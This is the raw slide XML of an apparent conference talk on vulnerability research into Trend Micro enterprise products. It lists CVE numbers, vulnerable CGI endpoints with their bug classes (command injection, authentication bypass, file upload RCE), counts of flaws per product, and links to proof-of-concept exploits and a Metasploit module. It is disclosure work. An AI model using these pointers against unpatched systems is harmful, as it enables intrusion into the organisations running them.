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257" r:id="rId3"/>
    <p:sldId id="267" r:id="rId4"/>
    <p:sldId id="273" r:id="rId5"/>
    <p:sldId id="279" r:id="rId6"/>
    <p:sldId id="274" r:id="rId7"/>
    <p:sldId id="276" r:id="rId8"/>
    <p:sldId id="277" r:id="rId9"/>
    <p:sldId id="278" r:id="rId10"/>
    <p:sldId id="415" r:id="rId11"/>
    <p:sldId id="413" r:id="rId12"/>
    <p:sldId id="414" r:id="rId13"/>
    <p:sldId id="386" r:id="rId14"/>
    <p:sldId id="387" r:id="rId15"/>
    <p:sldId id="388" r:id="rId16"/>
    <p:sldId id="392" r:id="rId17"/>
    <p:sldId id="391" r:id="rId18"/>
    <p:sldId id="393" r:id="rId19"/>
    <p:sldId id="395" r:id="rId20"/>
    <p:sldId id="416" r:id="rId21"/>
    <p:sldId id="394" r:id="rId22"/>
    <p:sldId id="351" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="289" r:id="rId25"/>
    <p:sldId id="408" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="284" r:id="rId28"/>
    <p:sldId id="288" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="404" r:id="rId31"/>
    <p:sldId id="405" r:id="rId32"/>
    <p:sldId id="320" r:id="rId33"/>
    <p:sldId id="419" r:id="rId34"/>
    <p:sldId id="327" r:id="rId35"/>
    <p:sldId id="328" r:id="rId36"/>
    <p:sldId id="324" r:id="rId37"/>
    <p:sldId id="325" r:id="rId38"/>
    <p:sldId id="329" r:id="rId39"/>
    <p:sldId id="330" r:id="rId40"/>
    <p:sldId id="331" r:id="rId41"/>
    <p:sldId id="332" r:id="rId42"/>
    <p:sldId id="409" r:id="rId43"/>
    <p:sldId id="333" r:id="rId44"/>
    <p:sldId id="422" r:id="rId45"/>
    <p:sldId id="335" r:id="rId46"/>
    <p:sldId id="337" r:id="rId47"/>
    <p:sldId id="341" r:id="rId48"/>
    <p:sldId id="342" r:id="rId49"/>
    <p:sldId id="343" r:id="rId50"/>
    <p:sldId id="344" r:id="rId51"/>
    <p:sldId id="346" r:id="rId52"/>
    <p:sldId id="347" r:id="rId53"/>
    <p:sldId id="348" r:id="rId54"/>
    <p:sldId id="349" r:id="rId55"/>
    <p:sldId id="350" r:id="rId56"/>
    <p:sldId id="357" r:id="rId57"/>
    <p:sldId id="420" r:id="rId58"/>
    <p:sldId id="361" r:id="rId59"/>
    <p:sldId id="358" r:id="rId60"/>
    <p:sldId id="359" r:id="rId61"/>
    <p:sldId id="360" r:id="rId62"/>
    <p:sldId id="362" r:id="rId63"/>
    <p:sldId id="364" r:id="rId64"/>
    <p:sldId id="365" r:id="rId65"/>
    <p:sldId id="363" r:id="rId66"/>
    <p:sldId id="319" r:id="rId67"/>
    <p:sldId id="294" r:id="rId68"/>
    <p:sldId id="295" r:id="rId69"/>
    <p:sldId id="296" r:id="rId70"/>
    <p:sldId id="369" r:id="rId71"/>
    <p:sldId id="370" r:id="rId72"/>
    <p:sldId id="371" r:id="rId73"/>
    <p:sldId id="396" r:id="rId74"/>
    <p:sldId id="397" r:id="rId75"/>
    <p:sldId id="398" r:id="rId76"/>
    <p:sldId id="372" r:id="rId77"/>
    <p:sldId id="399" r:id="rId78"/>
    <p:sldId id="400" r:id="rId79"/>
    <p:sldId id="401" r:id="rId80"/>
    <p:sldId id="402" r:id="rId81"/>
    <p:sldId id="373" r:id="rId82"/>
    <p:sldId id="374" r:id="rId83"/>
    <p:sldId id="410" r:id="rId84"/>
    <p:sldId id="426" r:id="rId85"/>
    <p:sldId id="316" r:id="rId86"/>
    <p:sldId id="297" r:id="rId87"/>
    <p:sldId id="309" r:id="rId88"/>
    <p:sldId id="310" r:id="rId89"/>
    <p:sldId id="311" r:id="rId90"/>
    <p:sldId id="312" r:id="rId91"/>
    <p:sldId id="313" r:id="rId92"/>
    <p:sldId id="430" r:id="rId93"/>
    <p:sldId id="314" r:id="rId94"/>
    <p:sldId id="315" r:id="rId95"/>
    <p:sldId id="298" r:id="rId96"/>
    <p:sldId id="299" r:id="rId97"/>
    <p:sldId id="307" r:id="rId98"/>
    <p:sldId id="412" r:id="rId99"/>
    <p:sldId id="411" r:id="rId100"/>
    <p:sldId id="423" r:id="rId101"/>
    <p:sldId id="427" r:id="rId102"/>
    <p:sldId id="429" r:id="rId103"/>
    <p:sldId id="380" r:id="rId104"/>
    <p:sldId id="384" r:id="rId105"/>
    <p:sldId id="301" r:id="rId106"/>
    <p:sldId id="425" r:id="rId107"/>
    <p:sldId id="385" r:id="rId108"/>
    <p:sldId id="302" r:id="rId109"/>
    <p:sldId id="352" r:id="rId110"/>
    <p:sldId id="354" r:id="rId111"/>
    <p:sldId id="355" r:id="rId112"/>
    <p:sldId id="356" r:id="rId113"/>
    <p:sldId id="303" r:id="rId114"/>
    <p:sldId id="304" r:id="rId115"/>
    <p:sldId id="305" r:id="rId116"/>
    <p:sldId id="270" r:id="rId117"/>
    <p:sldId id="280" r:id="rId118"/>
    <p:sldId id="376" r:id="rId119"/>
    <p:sldId id="377" r:id="rId120"/>
    <p:sldId id="378" r:id="rId121"/>
    <p:sldId id="306" r:id="rId122"/>
    <p:sldId id="424" r:id="rId1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5" autoAdjust="0"/>
    <p:restoredTop sz="94643" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="116" d="100"/>
          <a:sy n="116" d="100"/>
        </p:scale>
        <p:origin x="208" y="26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handoutMaster" Target="handoutMasters/handoutMaster1.xml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Total Affected Products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Remote Code Execution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Smart Protection Server</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Data Loss Prevention Manager</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Control Manager</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>InterScan Web Security</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Threat Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Mobile Security for Enterprise</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>SafeSync for Enterprise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3.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>26.0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>11.0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>42.0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>9.0</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>6.0</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>16.0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922-4424-B2DD-C859DF438F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SQL Injection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Smart Protection Server</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Data Loss Prevention Manager</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Control Manager</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>InterScan Web Security</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Threat Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Mobile Security for Enterprise</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>SafeSync for Enterprise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0.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>13.0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>29.0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.0</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>75.0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922-4424-B2DD-C859DF438F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Information Disclosure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Smart Protection Server</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Data Loss Prevention Manager</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Control Manager</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>InterScan Web Security</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Threat Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Mobile Security for Enterprise</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>SafeSync for Enterprise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0.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>4.0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>10.0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2.0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1.0</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>2.0</c:v>
                </c:pt>
                <c:pt idx="6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922-4424-B2DD-C859DF438FD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Elevation of Privileges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Smart Protection Server</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Data Loss Prevention Manager</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Control Manager</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>InterScan Web Security</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Threat Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Mobile Security for Enterprise</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>SafeSync for Enterprise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2.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2.0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1.0</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>4.0</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>1.0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Denial of Service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Smart Protection Server</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Data Loss Prevention Manager</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Control Manager</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>InterScan Web Security</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Threat Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Mobile Security for Enterprise</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>SafeSync for Enterprise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0.0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5734448"/>
        <c:axId val="495778880"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="49573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778880"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="49577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73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4/11/17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4/11/17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uk-UA" smtClean="0"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2571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0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8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0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3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B9E5-A166-46B4-8840-43DC3C3FB7E0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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098-939D-45F7-9FE3-AEDF96F6B8AF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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17C1-A8B6-4A84-9512-3F412CE42BF6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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090" y="5393804"/>
            <a:ext cx="3493977" cy="155679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970" y="5422201"/>
            <a:ext cx="2717146" cy="1528395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="381000"/>
          </a:effectLst>
        </p:spPr>
      </p:pic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FAEE-B41A-415E-985E-3FBC792CF949}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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B112-8B51-4D29-BBFA-80F3CFF96B69}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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2E1B-91A8-4E87-A937-587202C96DB5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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EDC3-117A-46D5-BCB1-AD7C401D53F3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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225A-30D2-4F50-876B-C277581CDE2E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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68A3-972F-4DD9-BFCB-6EEFF59AE500}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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623-BC2B-4C05-977B-9DF778C43F97}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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fld id="{032A62E1-5FAB-471F-852E-70FE14D60697}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/11/17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halkduster" charset="0"/>
          <a:ea typeface="Chalkduster" charset="0"/>
          <a:cs typeface="Chalkduster" charset="0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alerisch/5de8b408443ee9253b3954a62a8d97b4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/malerisch/b8764501d299f2ec9eb145258d404e5f" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/malerisch/91239147d4fceffa63006974889ef1af" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/malerisch/aac1ad3e6f3bfd70b35ba6538ecbff23" TargetMode="External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malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33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alerisch/3bbb6d0b235fa5af2ba6f05826fe3846" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/malerisch/7b84a4bd6eee0a3a591677f421653a2e" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/malerisch/5dd838a723b342bb04121f29a8333e00" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/malerisch/0c78e49124561524fd59d6635007eefd" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/malerisch/c59ab650c8e226ef22cdfbfeeee6d4ec" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/pull/8216" TargetMode="External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malerisch/93be2141dfc5709159468762937f2853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gi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srcincite.io/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/malerisch" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.malerisch.net/" TargetMode="External"/><Relationship Id="rId6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steventseeley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qkaiser.github.io/pentesting/trendmicro/2016/09/06/trendmicro-safesync/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/cogitoergor00t/status/771768758289494016" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/korprit/status/758356923779461120" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=KWfIgq3iZ8A" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=9-906rJ2HX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kaiser.github.io/pentesting/trendmicro/2016/08/08/trendmicro-sps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112563" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asciinema.org/a/11256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sciinema.org/a/112568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malerisch.net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malerisch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ccess.trendmicro.com/solution/1117033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rcincite.io/" TargetMode="External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steventseeley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orelogic.com/Resources/Advisories/KL-001-2017-003.txt" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt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I got 99 trend’s and a # is all of them!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 font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How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ound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ver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>100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200+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RCE vulnerabilities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 Trend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Micro software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i="1" dirty="0" smtClean="0"/>
              <a:t>“How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" i="1" dirty="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" i="1" dirty="0" smtClean="0"/>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" i="1" dirty="0"/>
              <a:t>fully compromise this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" i="1" dirty="0" smtClean="0"/>
              <a:t>product without user interaction?”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="60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061709" y="5692271"/>
            <a:ext cx="18473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9" y="1731616"/>
            <a:ext cx="11593288" cy="512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6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for #HITB2017AMS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905000"/>
            <a:ext cx="10873208" cy="4404320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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Proof of Concept exploit code for the following vulnerabilities </a:t>
            </a:r>
            <a:b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affecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Trend Micro Threat Discovery Appliance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en-US" sz="7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CVE-2016-8584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]::Session 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Generation Authentication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Bypass</a:t>
            </a:r>
          </a:p>
          <a:p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CVE-2016-7552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]::Directory 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Traversal Authentication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Bypass</a:t>
            </a:r>
          </a:p>
          <a:p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CVE-2016-8586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 smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>dlp_policy_upload.cgi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Information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Disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pP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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CVE-2016-8585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 smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>admin_sys_time.cgi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Command Injection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RCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CVE-2016-8585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 smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>detected_potential_files.cgi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Command Injection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RCE</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE-2016-8587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>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>dlp_policy_upload.cgi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 Zip Extraction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RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="21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1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lang="en-US" sz="21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74320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="http://www.shzongyue.com/data/out/27/38881957-bonu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215280"/>
            <a:ext cx="270029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9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wait, there's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905000"/>
            <a:ext cx="10513168" cy="440432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CVE-2016-8588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>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>hotfix_upload.cgi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 Command Injection RCE</a:t>
            </a:r>
          </a:p>
          <a:p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CVE-2016-8589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>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>log_query_dae.cgi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 Command Injection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RCE</a:t>
            </a:r>
          </a:p>
          <a:p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CVE-2016-8590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 smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>log_query_dlp.cgi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Command Injection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RCE</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CVE-2016-8591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 smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>log_query.cgi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Command Injection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RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pP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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE-2016-8592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 smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>log_query_system.cgi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7200" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Command Injection 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RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pP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  <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>CVE-2016-8593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]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>upload.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> File Upload RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="7200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2" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Finally, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>pull request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1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sz="8000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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0" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>uses CVE-2016-7552 and CVE-2016-7547 !</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8000" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef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74320" lvl="2" indent="-274320">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef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74320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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4" descr="http://www.shzongyue.com/data/out/27/38881957-bonu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215280"/>
            <a:ext cx="270029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2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Security for Enterprise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Central solution to secure mobile devices within an organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, iOS, Windows Phones, Blackberry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Policies based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Under the hood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows IIS / Compiled CGI / MSSQL / PHP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How many vulnerabilities?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found remote memory corruption pre-authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sitting on 80 zero-day’s, at least 10 are pre-authenticated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Authentication bypasses also exist in the target...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>But...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zero-day, sorry!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2082998"/>
            <a:ext cx="6948512" cy="391120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061709" y="5692271"/>
            <a:ext cx="18473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2" y="1700808"/>
            <a:ext cx="11662958" cy="51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SafeSync for Enterprise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Central enterprise solution to secure data within an organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provides encryption and data tagging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File versioning and backup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ACL on who can access what</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Under the hood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux CentOS Appliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
